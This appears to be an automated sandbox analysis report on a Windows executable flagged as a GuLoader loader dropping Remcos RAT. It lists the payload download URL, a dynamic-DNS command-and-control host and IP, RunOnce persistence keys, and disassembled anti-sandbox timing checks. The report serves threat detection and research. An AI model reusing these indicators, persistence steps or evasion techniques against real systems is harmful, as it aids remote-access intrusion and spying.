Windows Analysis Report pRcHGlVekw.exe

Overview

General Information

Sample Name:	pRcHGlVekw.exe
Analysis ID:	458794
MD5:	d2cb32f7c7f384b4baa8dd13d6b5bbab
SHA1:	355acb5af5caaeb59fd7c9e0a54b501c24d47919
SHA256:	2bd846bdda945dc48a21c9bda1497feb9e67df8cfb024cc8669041490c7c9a90
Tags:	32exe
Infos:
Most interesting Screenshot:

Detection

GuLoader Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

GuLoader behavior detected

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Remcos RAT

C2 URLs / IPs found in malware configuration

Creates autostart registry keys with suspicious values (likely registry only malware)

Hides threads from debuggers

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses dynamic DNS services

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe

ReversingLabs: Detection: 17%

Multi AV Scanner detection for submitted file

Source: pRcHGlVekw.exe

ReversingLabs: Detection: 17%

Yara detected Remcos RAT

Source: Yara match

File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: pRcHGlVekw.exe

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Source: pRcHGlVekw.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://101.99.94.119/WEALTH_fkWglQyCXO188.binkw

Uses dynamic DNS services

Source: unknown

DNS query: name: wealthyrem.ddns.net

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.3:49737 -> 194.5.97.128:39200

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 194.5.97.128 194.5.97.128
Source: Joe Sandbox View	IP Address: 101.99.94.119 101.99.94.119

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: DANILENKODE DANILENKODE
Source: Joe Sandbox View	ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown	TCP traffic detected without corresponding DNS query: 101.99.94.119

Source: global traffic

HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: wealthyrem.ddns.net

Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin
Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\pRcHGlVekw.exe

Jump to behavior

E-Banking Fraud:

Yara detected Remcos RAT

Source: Yara match

File source: 00000010.00000002.1300727955.00000000008E8000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Process Stats: CPU usage > 98%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218929D NtProtectVirtualMemory,	1_2_0218929D
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218435F NtWriteVirtualMemory,	1_2_0218435F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021859E6 NtAllocateVirtualMemory,	1_2_021859E6
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185A22 NtAllocateVirtualMemory,	1_2_02185A22
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218486E NtWriteVirtualMemory,	1_2_0218486E
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021846AC NtWriteVirtualMemory,	1_2_021846AC
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02184CFA NtWriteVirtualMemory,	1_2_02184CFA
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218914B NtProtectVirtualMemory,	1_2_0218914B
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185564 NtWriteVirtualMemory,TerminateProcess,	1_2_02185564
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02181766 NtWriteVirtualMemory,	1_2_02181766
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183DA0 NtWriteVirtualMemory,	1_2_02183DA0

Detected potential crypto function

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218561A	1_2_0218561A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218226F	1_2_0218226F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02180E63	1_2_02180E63
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02189695	1_2_02189695
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021806BF	1_2_021806BF
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218435F	1_2_0218435F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02188817	1_2_02188817
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183A2B	1_2_02183A2B
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182021	1_2_02182021
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02188053	1_2_02188053
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02180248	1_2_02180248
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218486E	1_2_0218486E
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218086F	1_2_0218086F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185E60	1_2_02185E60
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182A67	1_2_02182A67
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185E67	1_2_02185E67
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02187C9A	1_2_02187C9A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021896A8	1_2_021896A8
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021846AC	1_2_021846AC
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021886D9	1_2_021886D9
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02180CDF	1_2_02180CDF
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182EC2	1_2_02182EC2
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02184CFA	1_2_02184CFA
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021810F0	1_2_021810F0
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02180CE4	1_2_02180CE4
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183B1F	1_2_02183B1F
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02184111	1_2_02184111
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02181113	1_2_02181113
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02181136	1_2_02181136
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183123	1_2_02183123
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182B4B	1_2_02182B4B
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183944	1_2_02183944
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02182F76	1_2_02182F76
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185D6E	1_2_02185D6E
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02188960	1_2_02188960
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02185564	1_2_02185564
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02181766	1_2_02181766
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02181BBB	1_2_02181BBB
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02183DA0	1_2_02183DA0
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021879D6	1_2_021879D6
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021807F2	1_2_021807F2
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_02180DF4	1_2_02180DF4
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_021803F6	1_2_021803F6

PE file contains strange resources

Source: pRcHGlVekw.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: pRcHGlVekw.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UNDERDEVELOPED.exe.16.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UNDERDEVELOPED.exe.16.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Source: pRcHGlVekw.exe, 00000001.00000000.219062533.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe
Source: pRcHGlVekw.exe, 00000001.00000002.344452128.0000000002090000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs pRcHGlVekw.exe
Source: pRcHGlVekw.exe, 00000010.00000002.1306296984.000000001DD60000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs pRcHGlVekw.exe
Source: pRcHGlVekw.exe, 00000010.00000000.341877354.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe
Source: pRcHGlVekw.exe	Binary or memory string: OriginalFilenameLIEGEMAN.exe vs pRcHGlVekw.exe

Uses 32bit PE files

Source: pRcHGlVekw.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/3@175/3

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

File created: C:\Users\user\AppData\Roaming\remcos

Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

File created: C:\Users\user\AppData\Local\Temp\~DF4931134DE445F613.TMP

Jump to behavior

Source: pRcHGlVekw.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: pRcHGlVekw.exe

ReversingLabs: Detection: 17%

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

File read: C:\Users\user\Desktop\pRcHGlVekw.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process created: C:\Users\user\Desktop\pRcHGlVekw.exe 'C:\Users\user\Desktop\pRcHGlVekw.exe'	Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.344627340.0000000002180000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_00407108 push ebp; retf	1_2_00407109
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218A033 push ds; retf	1_2_0218A036
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218A037 push ds; retf	1_2_0218A03A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218A02B push ds; retf	1_2_0218A02E
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218A02F push ds; retf	1_2_0218A032
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 1_2_0218A027 push ds; retf	1_2_0218A02A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 16_2_0056A037 push ds; retf	16_2_0056A03A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 16_2_0056A033 push ds; retf	16_2_0056A036
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 16_2_0056A027 push ds; retf	16_2_0056A02A
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 16_2_0056A02F push ds; retf	16_2_0056A032
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Code function: 16_2_0056A02B push ds; retf	16_2_0056A02E

Source: initial sample	Static PE information: section name: .text entropy: 7.08042704515
Source: initial sample	Static PE information: section name: .text entropy: 7.08042704515

Persistence and Installation Behavior:

Drops PE files

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

File created: C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.exe

Jump to dropped file

Boot Survival:

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbs			Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN C:\Users\user\AppData\Local\Temp\HOMOTYPY\UNDERDEVELOPED.vbs			Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce DRAWSPAN	Jump to behavior

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=\UNDERDEVELOPED.EXE\HOMOTYPYSET W = CREATEOBJECT("WSCRIPT.SHELL")
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp, pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: pRcHGlVekw.exe, 00000001.00000002.344662425.0000000002190000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\UNDERDEVELOPED.EXE\HOMOTYPYSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCEDRAWSPAN

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	RDTSC instruction interceptor: First address: 0000000002187EBB second address: 0000000002187EBB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 01B6460Dh 0x00000007 xor eax, BEFED3B1h 0x0000000c sub eax, 17554910h 0x00000011 add eax, 580CB355h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F4E1C9F6F80h 0x0000001e lfence 0x00000021 mov edx, 1889B9A2h 0x00000026 xor edx, A7C3F6EDh 0x0000002c add edx, 20E9D255h 0x00000032 xor edx, 9FCA21B0h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d test dh, 0000006Eh 0x00000040 test cx, cx 0x00000043 cmp cx, dx 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a test dh, ah 0x0000004c add edi, edx 0x0000004e dec dword ptr [ebp+000000F8h] 0x00000054 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000005b jne 00007F4E1C9F6E7Ah 0x0000005d call 00007F4E1C9F6EDDh 0x00000062 call 00007F4E1C9F6FA1h 0x00000067 lfence 0x0000006a mov edx, 1889B9A2h 0x0000006f xor edx, A7C3F6EDh 0x00000075 add edx, 20E9D255h 0x0000007b xor edx, 9FCA21B0h 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 test dh, 0000006Eh 0x00000089 test cx, cx 0x0000008c cmp cx, dx 0x0000008f ret 0x00000090 mov esi, edx 0x00000092 pushad 0x00000093 rdtsc
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	RDTSC instruction interceptor: First address: 0000000002187FF6 second address: 0000000002187FF6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DFFADC29h 0x00000013 xor eax, 5D423971h 0x00000018 xor eax, 6D1D2D19h 0x0000001d add eax, 105A37C0h 0x00000022 cpuid 0x00000024 psubd mm7, mm2 0x00000027 bt ecx, 1Fh 0x0000002b jc 00007F4E1C91B0F3h 0x00000031 popad 0x00000032 call 00007F4E1C91ABBEh 0x00000037 lfence 0x0000003a rdtsc
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	RDTSC instruction interceptor: First address: 0000000000567EBB second address: 0000000000567EBB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 01B6460Dh 0x00000007 xor eax, BEFED3B1h 0x0000000c sub eax, 17554910h 0x00000011 add eax, 580CB355h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F4E1C9F6F80h 0x0000001e lfence 0x00000021 mov edx, 1889B9A2h 0x00000026 xor edx, A7C3F6EDh 0x0000002c add edx, 20E9D255h 0x00000032 xor edx, 9FCA21B0h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d test dh, 0000006Eh 0x00000040 test cx, cx 0x00000043 cmp cx, dx 0x00000046 ret 0x00000047 sub edx, esi 0x00000049 ret 0x0000004a test dh, ah 0x0000004c add edi, edx 0x0000004e dec dword ptr [ebp+000000F8h] 0x00000054 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000005b jne 00007F4E1C9F6E7Ah 0x0000005d call 00007F4E1C9F6EDDh 0x00000062 call 00007F4E1C9F6FA1h 0x00000067 lfence 0x0000006a mov edx, 1889B9A2h 0x0000006f xor edx, A7C3F6EDh 0x00000075 add edx, 20E9D255h 0x0000007b xor edx, 9FCA21B0h 0x00000081 mov edx, dword ptr [edx] 0x00000083 lfence 0x00000086 test dh, 0000006Eh 0x00000089 test cx, cx 0x0000008c cmp cx, dx 0x0000008f ret 0x00000090 mov esi, edx 0x00000092 pushad 0x00000093 rdtsc
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	RDTSC instruction interceptor: First address: 0000000000567FF6 second address: 0000000000567FF6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DFFADC29h 0x00000013 xor eax, 5D423971h 0x00000018 xor eax, 6D1D2D19h 0x0000001d add eax, 105A37C0h 0x00000022 cpuid 0x00000024 psubd mm7, mm2 0x00000027 bt ecx, 1Fh 0x0000002b jc 00007F4E1C91B0F3h 0x00000031 popad 0x00000032 call 00007F4E1C91ABBEh 0x00000037 lfence 0x0000003a rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Code function: 1_2_02187EB3 rdtsc

1_2_02187EB3

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\pRcHGlVekw.exe

Window / User API: foregroundWindowGot 547

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\pRcHGlVekw.exe TID: 5624	Thread sleep count: 276 > 30			Jump to behavior
Source: C:\Users\user\Desktop\pRcHGlVekw.exe TID: 5624	Thread sleep time: -138000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\pRcHGlVekw.exe	Last function: Thread delayed

Source: pRcHGlVekw.exe, 00000010.00000002.1300566726.00000000007C0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=\UNDERDEVELOPED.exe\HOMOTYPYSet W = CreateObject("WScript.Shell")
